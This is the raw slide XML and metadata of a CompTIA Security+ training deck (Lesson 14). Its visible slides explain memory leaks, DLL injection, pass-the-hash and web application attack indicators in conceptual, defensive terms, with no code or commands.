    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3374181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6180E4-25D9-4D0E-8A9F-B5B3EFDE775A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Memory Leaks and Resource Exhaustion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1DABFDB-6C58-4BAF-BAC0-3D7AA44579DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Memory leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Process allocates memory locations, but never releases them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Can cause host to run out of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Could be faulty code or could be malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3888E6B-4C84-49CC-B89C-3B3B01CEFC1E}"/>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id="{381CEEA8-F128-4A06-A87F-D0924F6EA876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157557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DLL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Dynamic Link Library (DLL) implements some function that multiple processes can use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DLL injection is a vulnerability in the way the operating system allows one process to attach to another. This functionality can be abused by malware to force a legitimate process to load a malicious link library. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>A process that has been compromised by DLL injection might open unexpected network connections, or interact with files and the registry suspiciously.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Refactoring might allow code obfuscation to elude anti-virus- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refactoring means that the A-V software may no longer identify the malware by its signature.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476650E4-4AD2-493B-95CE-443D479C07C8}"/>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id="{7C24666C-5245-409F-A740-26216C587779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1188879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B4B175-5EB7-49D1-A5C9-40D4B9870703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the Hash Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDD043C-DAD8-4C7C-BC94-020815D14CE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341927" y="708660"/>
            <a:ext cx="4324126" cy="4160963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Attackers can extend their lateral movement if they are able to compromise host credentials. One common credential exploit technique for lateral movement is called pass the hash (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PtH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware executes another process on a remote host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can just pass hash without having to crack it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote host will accept hash as credential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection through security log events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1375ED-B9E2-45D3-A957-CACAF52EE73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495800" y="1104180"/>
            <a:ext cx="4818005" cy="271163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2A60CAFB-7174-4D93-9A19-D179146C92AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065238" y="4869623"/>
            <a:ext cx="7165928" cy="274637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CompTIA Security+ Lesson 14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id="{EE7FC925-CD44-4C17-9847-6EE90AE8ACF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6CA517-C926-4745-AD3A-3707897CE70D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7914937" y="3931738"/>
            <a:ext cx="1285929" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Images © 123rf.com.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4086448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939F7-FEDC-49EF-9D63-4C3955535BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Indicators of Web Application Attacks </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8646C11D-91BD-4E6B-95A1-7538DE61B092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Topic 14B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5B193E-304C-4F38-9F7A-B58AC493A58F}"/>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id="{C47652A1-CFA2-4740-ACCE-41117D435DE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2959651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77605-777E-F786-7D58-71D73F7549E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715845" y="1555108"/>
            <a:ext cx="7884740" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A web application exposes many interfaces to public networks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers can exploit vulnerabilities in server software and in client browser security to perform injection and session hijacking attacks that compromise data confidentiality and integrity. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4051252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CC24-E5A6-4503-A648-BAC106D6DD36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341927" y="75202"/>
            <a:ext cx="8455567" cy="633458"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uniform Resource Locator Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EC2F07A-A701-44BB-B761-F5B733CCF7E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226974" y="671158"/>
            <a:ext cx="4153873" cy="3376241"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>A URL can encode some action or data to submit to the server host. This is a common vector for malicious activity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET, POST, PUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST or PUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL (query parameters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP response codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>GET-- used to retrieve a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>• POST—send data to the server for processing by the requested resource. • PUT—create or replace the resource. DELETE can be used to remove the resource. • HEAD—retrieve the headers for a resource only (not the body).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="A screenshot of a social media post&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{663915CB-0C43-4A37-9832-BA36E66B3755}"/>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4080836" y="1710731"/>
            <a:ext cx="5063163" cy="2463778"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF4FAA6-4ACB-4268-92A5-5D1E4650E1A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CompTIA Security+ Lesson 14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id="{287AB649-7F5F-494F-91DF-5B97029D16BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1273614768"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="comptia_ov">
  <a:themeElements>
    <a:clrScheme name="comptia">
      <a:dk1>
        <a:srgbClr val="44545F"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="004D71"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EAEAEA"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0A7DA0"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="005C76"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AAECFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="B1B7BC"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="ED1C24"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="ED6D00"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="009DDC"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="009DDC"/>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mptia_ov" id="{A1267259-ADC0-49AF-AB12-5D57617C9A52}" vid="{E4C4D14F-4B84-415E-9D68-F040C08409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8AB8BE3257A504EB15FA3D006F5CE14" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="418cf6fe0ea8ffec7f4bbd14d3bb840a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="95a46270-66ec-4bdf-aabc-d78887d51418" xmlns:ns3="315eb565-7267-4a95-9087-2f433ded3c8b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="fcf3f344b082f4df2f3eec2af3a5ce44" ns2:_="" ns3:_="">
    <xsd:import namespace="95a46270-66ec-4bdf-aabc-d78887d51418"/>
    <xsd:import namespace="315eb565-7267-4a95-9087-2f433ded3c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46270-66ec-4bdf-aabc-d78887d51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5eb565-7267-4a95-9087-2f433ded3c8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2CFB8D-1019-43EC-BFD1-51DA40016399}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{79804A4A-BEBA-46F7-8D91-096B77966F9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7B57CFE-2576-4ADE-A6F2-7DA9509079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46270-66ec-4bdf-aabc-d78887d51418"/>
    <ds:schemaRef ds:uri="315eb565-7267-4a95-9087-2f433ded3c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comptia_ov</Template>
  <TotalTime>1165</TotalTime>
  <Words>3389</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>330</Paragraphs>
  <Slides>33</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Open Sans</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>comptia_ov</vt:lpstr>
      <vt:lpstr>Summarizing Secure Application Concepts </vt:lpstr>
      <vt:lpstr>Application Attacks</vt:lpstr>
      <vt:lpstr>Overflow Vulnerabilities</vt:lpstr>
      <vt:lpstr>Memory Leaks and Resource Exhaustion</vt:lpstr>
      <vt:lpstr>DLL Injection</vt:lpstr>
      <vt:lpstr>Pass the Hash Attack</vt:lpstr>
      <vt:lpstr>Analyze Indicators of Web Application Attacks </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Uniform Resource Locator Analysis</vt:lpstr>
      <vt:lpstr>Application Programming Interface Attacks</vt:lpstr>
      <vt:lpstr>Replay Attacks</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Structured Query Language Injection Attacks</vt:lpstr>
      <vt:lpstr>Directory Traversal</vt:lpstr>
      <vt:lpstr>Summarize Secure Coding Practices </vt:lpstr>
      <vt:lpstr>Static Code Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Code Analysis</vt:lpstr>
      <vt:lpstr>Implement Secure Script Environments </vt:lpstr>
      <vt:lpstr>Scripting</vt:lpstr>
      <vt:lpstr>Python Script Environment</vt:lpstr>
      <vt:lpstr>Execution Control</vt:lpstr>
      <vt:lpstr>Malicious Code Indicators</vt:lpstr>
      <vt:lpstr>Bash and Python Malicious Indicators</vt:lpstr>
      <vt:lpstr>Visual Basic for Applications (VBA)</vt:lpstr>
      <vt:lpstr>Man-in-the-Browser Attack</vt:lpstr>
      <vt:lpstr>Summarize Deployment and Automation Concepts</vt:lpstr>
      <vt:lpstr>Application Development, Deployment, and Automation</vt:lpstr>
      <vt:lpstr>Secure Application Development Environments</vt:lpstr>
      <vt:lpstr>Provisioning, Deprovisioning, and Version Control</vt:lpstr>
      <vt:lpstr>Automation/Scripting Release Paradigms</vt:lpstr>
      <vt:lpstr>Software Diversity</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>CompTIA,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CompTIA Security+ | Lesson 14 | Summarizing Secure Application Concepts</dc:title>
  <dc:subject>Slide deck to accompany a CompTIA OCC study guide</dc:subject>
  <dc:creator>James Pengelly</dc:creator>
  <dc:description>Copyright © 2020 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software proprietor.</dc:description>
  <cp:lastModifiedBy>Chetna Vaid Kwatra</cp:lastModifiedBy>
  <cp:revision>49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-06T09:53:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-04T17:54:31Z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0x010100F8AB8BE3257A504EB15FA3D006F5CE14</vt:lpwstr>
  </property>
</Properties>
</file>